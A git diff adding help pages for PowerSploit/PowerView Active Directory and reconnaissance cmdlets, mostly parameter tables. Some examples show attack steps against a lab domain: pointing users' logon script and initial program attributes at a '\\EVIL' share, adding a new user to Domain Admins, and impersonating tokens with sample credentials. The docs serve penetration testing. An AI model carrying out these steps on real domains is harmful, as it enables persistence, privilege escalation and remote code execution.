+Parameter Sets: (All)
+Aliases: iP
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TopPorts
+Include the x top ports - only goes to 1000, default is top 50
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludedPorts
+Exclude these comma seperated ports
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: xPorts
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SkipDiscovery
+Treat all hosts as online, skip host discovery
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Pn
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PingOnly
+Ping scan only (disable port scan)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: sn
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DiscoveryPorts
+Comma separated ports used for host discovery.
+-1 is a ping
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: PS
+
+Required: False
+Position: Named
+Default value: -1,445,80,443
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+number of max threads for the thread pool (per host)
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 100
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -nHosts
+number of hosts to concurrently scan
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 25
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Timeout
+Timeout time on a connection in miliseconds before port is declared filtered
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 2000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SleepTimer
+Wait before thread checking, in miliseconds
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 500
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SyncFreq
+How often (in terms of hosts) to sync threads and flush output
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 1024
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -T
+\[0-5\] shortcut performance options.
+Default is 3.
+higher is more aggressive.
+Sets (nhosts, threads,timeout)
+ 5 {$nHosts=30; $Threads = 1000; $Timeout = 750 }
+ 4 {$nHosts=25; $Threads = 1000; $Timeout = 1200 }
+ 3 {$nHosts=20; $Threads = 100; $Timeout = 2500 }
+ 2 {$nHosts=15; $Threads = 32; $Timeout = 3000 }
+ 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -GrepOut
+Greppable output file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oG
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -XmlOut
+output XML file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oX
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReadableOut
+output file in 'readable' format
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oN
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AllformatsOut
+output in readable (.nmap), xml (.xml), and greppable (.gnmap) formats
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oA
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -noProgressMeter
+Suppresses the progress meter
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -quiet
+supresses returned output and don't store hosts in memory - useful for very large scans
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: q
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ForceOverwrite
+Force Overwrite if output Files exist.
+Otherwise it throws exception
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: F
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://webstersprodigy.net](http://webstersprodigy.net)
+
diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md new file mode 100755 index 0000000..2c74e3c --- /dev/null +++ b/docs/Recon/Invoke-ReverseDnsLookup.md @@ -0,0 +1,106 @@ +# Invoke-ReverseDnsLookup
+
+## SYNOPSIS
+Perform a reverse DNS lookup scan on a range of IP addresses.
+
+PowerSploit Function: Invoke-ReverseDnsLookup
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-ReverseDnsLookup [-IpRange] <String>
+```
+
+## DESCRIPTION
+Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records.
+This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-ReverseDnsLookup 74.125.228.0/29
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.2 iad23s05-in-f2.1e100.net
+74.125.228.3 iad23s05-in-f3.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses specified by the CIDR range.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses specified by the IP range specified.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.2 iad23s05-in-f2.1e100.net
+74.125.228.3 iad23s05-in-f3.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses piped from another source.
+
+## PARAMETERS
+
+### -IpRange
+Specifies the IP address range.
+The range provided can be in the form of a single IP address, a low-high range, or a CIDR range.
+Comma-delimited ranges may can be provided.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com
+https://github.com/mattifestation/PowerSploit]()
+
diff --git a/docs/Recon/Invoke-RevertToSelf.md b/docs/Recon/Invoke-RevertToSelf.md new file mode 100755 index 0000000..4e978ac --- /dev/null +++ b/docs/Recon/Invoke-RevertToSelf.md @@ -0,0 +1,56 @@ +# Invoke-RevertToSelf
+
+## SYNOPSIS
+Reverts any token impersonation.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Invoke-RevertToSelf [[-TokenHandle] <IntPtr>]
+```
+
+## DESCRIPTION
+This function uses RevertToSelf() to revert any impersonated tokens.
+If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
+CloseHandle() is used to close the opened handle.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$Token = Invoke-UserImpersonation -Credential $Cred
+Invoke-RevertToSelf -TokenHandle $Token
+
+## PARAMETERS
+
+### -TokenHandle
+An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
+
+```yaml
+Type: IntPtr
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Invoke-UserImpersonation.md b/docs/Recon/Invoke-UserImpersonation.md new file mode 100755 index 0000000..6b1afc4 --- /dev/null +++ b/docs/Recon/Invoke-UserImpersonation.md @@ -0,0 +1,100 @@ +# Invoke-UserImpersonation
+
+## SYNOPSIS
+Creates a new "runas /netonly" type logon and impersonates the token.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### Credential (Default)
+```
+Invoke-UserImpersonation -Credential <PSCredential> [-Quiet]
+```
+
+### TokenHandle
+```
+Invoke-UserImpersonation -TokenHandle <IntPtr> [-Quiet]
+```
+
+## DESCRIPTION
+This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
+to simulate "runas /netonly".
+The resulting token is then impersonated with
+ImpersonateLoggedOnUser() and the token handle is returned for later usage
+with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Invoke-UserImpersonation -Credential $Cred
+
+## PARAMETERS
+
+### -Credential
+A \[Management.Automation.PSCredential\] object with alternate credentials
+to impersonate in the current thread space.
+
+```yaml
+Type: PSCredential
+Parameter Sets: Credential
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TokenHandle
+An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
+If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
+is executed.
+
+```yaml
+Type: IntPtr
+Parameter Sets: TokenHandle
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Quiet
+Suppress any warnings about STA vs MTA.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### IntPtr
+
+The TokenHandle result from LogonUser.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/New-DomainGroup.md b/docs/Recon/New-DomainGroup.md new file mode 100755 index 0000000..fc5cac0 --- /dev/null +++ b/docs/Recon/New-DomainGroup.md @@ -0,0 +1,150 @@ +# New-DomainGroup
+
+## SYNOPSIS
+Creates a new domain group (assuming appropriate permissions) and returns the group object.
+
+TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+New-DomainGroup [-SamAccountName] <String> [[-Name] <String>] [[-DisplayName] <String>]
+ [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.GroupPrincipal with the specified
+group properties.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
+```
+
+Creates the 'TestGroup' group with the specified description.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred
+
+Creates the 'TestGroup' group with the specified description using the specified alternate credentials.
+
+## PARAMETERS
+
+### -SamAccountName
+Specifies the Security Account Manager (SAM) account name of the group to create.
+Maximum of 256 characters.
+Mandatory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Name
+Specifies the name of the group to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisplayName
+Specifies the display name of the group to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Description
+Specifies the description of the group to create.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### DirectoryServices.AccountManagement.GroupPrincipal
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/New-DomainUser.md b/docs/Recon/New-DomainUser.md new file mode 100755 index 0000000..80f4fcf --- /dev/null +++ b/docs/Recon/New-DomainUser.md @@ -0,0 +1,184 @@ +# New-DomainUser
+
+## SYNOPSIS
+Creates a new domain user (assuming appropriate permissions) and returns the user object.
+
+TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+New-DomainUser [-SamAccountName] <String> [-AccountPassword] <SecureString> [[-Name] <String>]
+ [[-DisplayName] <String>] [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword
+
+Creates the 'harmj0y2' user with the specified description and password.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred
+
+Creates the 'harmj0y2' user with the specified description and password, using the specified
+alternate credentials.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+## PARAMETERS
+
+### -SamAccountName
+Specifies the Security Account Manager (SAM) account name of the user to create.
+Maximum of 256 characters.
+Mandatory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AccountPassword
+Specifies the password for the created user.
+Mandatory.
+
+```yaml
+Type: SecureString
+Parameter Sets: (All)
+Aliases: Password
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Name
+Specifies the name of the user to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisplayName
+Specifies the display name of the user to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Description
+Specifies the description of the user to create.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### DirectoryServices.AccountManagement.UserPrincipal
+
+## NOTES
+
+## RELATED LINKS
+
+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)
+
diff --git a/docs/Recon/Remove-RemoteConnection.md b/docs/Recon/Remove-RemoteConnection.md new file mode 100755 index 0000000..fe6f3b3 --- /dev/null +++ b/docs/Recon/Remove-RemoteConnection.md @@ -0,0 +1,84 @@ +# Remove-RemoteConnection
+
+## SYNOPSIS
+Destroys a connection created by New-RemoteConnection.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### ComputerName (Default)
+```
+Remove-RemoteConnection [-ComputerName] <String[]>
+```
+
+### Path
+```
+Remove-RemoteConnection [-Path] <String[]>
+```
+
+## DESCRIPTION
+This function uses WNetCancelConnection2 to destroy a connection created by
+New-RemoteConnection.
+If a -Path isn't specified, a -ComputerName is required to
+'unmount' \\\\$ComputerName\IPC$.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
+```
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to remove a \\\\ComputerName\IPC$ connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: HostName, dnshostname, name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remote \\\\UNC\path to remove the connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: Path
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Resolve-IPAddress.md b/docs/Recon/Resolve-IPAddress.md new file mode 100755 index 0000000..744c764 --- /dev/null +++ b/docs/Recon/Resolve-IPAddress.md @@ -0,0 +1,66 @@ +# Resolve-IPAddress
+
+## SYNOPSIS
+Resolves a given hostename to its associated IPv4 address.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Resolve-IPAddress [[-ComputerName] <String[]>]
+```
+
+## DESCRIPTION
+Resolves a given hostename to its associated IPv4 address using
+\[Net.Dns\]::GetHostEntry().
+If no hostname is provided, the default
+is the IP address of the localhost.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Resolve-IPAddress -ComputerName SERVER
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+@("SERVER1", "SERVER2") | Resolve-IPAddress
+```
+
+## PARAMETERS
+
+### -ComputerName
+{{Fill ComputerName Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more IP address strings on the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+A custom PSObject with the ComputerName and IPAddress.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md new file mode 100755 index 0000000..8cb283b --- /dev/null +++ b/docs/Recon/Set-DomainObject.md @@ -0,0 +1,322 @@ +# Set-DomainObject
+
+## SYNOPSIS
+Modifies a gven property for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+## SYNTAX
+
+```
+Set-DomainObject [[-Identity] <String[]>] [-Set <Hashtable>] [-XOR <Hashtable>] [-Clear <String[]>]
+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Splats user/object targeting parameters to Get-DomainObject, returning the raw
+searchresult object.
+Retrieves the raw directoryentry for the object, and sets
+any values from -Set @{}, XORs any values from -XOR @{}, and clears any values
+from -Clear @().
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program.exe for object testuser
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string:
+(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object harmj0y
+VERBOSE: Setting countrycode to 1234 for object harmj0y
+VERBOSE: Get-DomainSearcher search string:
+LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object testuser
+VERBOSE: Setting countrycode to 1234 for object testuser
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose
+```
+
+Cleares the 'department' field for both object identities.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+```
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+
+
+Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'
+
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Get-DomainUser -Identity testuser -Properties scriptpath
+```
+
+scriptpath
+----------
+\\\\primary\sysvol\blah.ps1
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\EVIL\program2.exe'} -Credential $Cred -Verbose
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: \[Set-DomainObject\] Setting 'scriptpath' to '\\\\EVIL\program2.exe' for object 'testuser'
+
+Get-DomainUser -Identity testuser -Properties scriptpath
+
+scriptpath
+----------
+\\\\EVIL\program2.exe
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Set
+Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases: Reaplce
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -XOR
+Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Clear
+Specifies an array of object properties that will be cleared in the directory.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
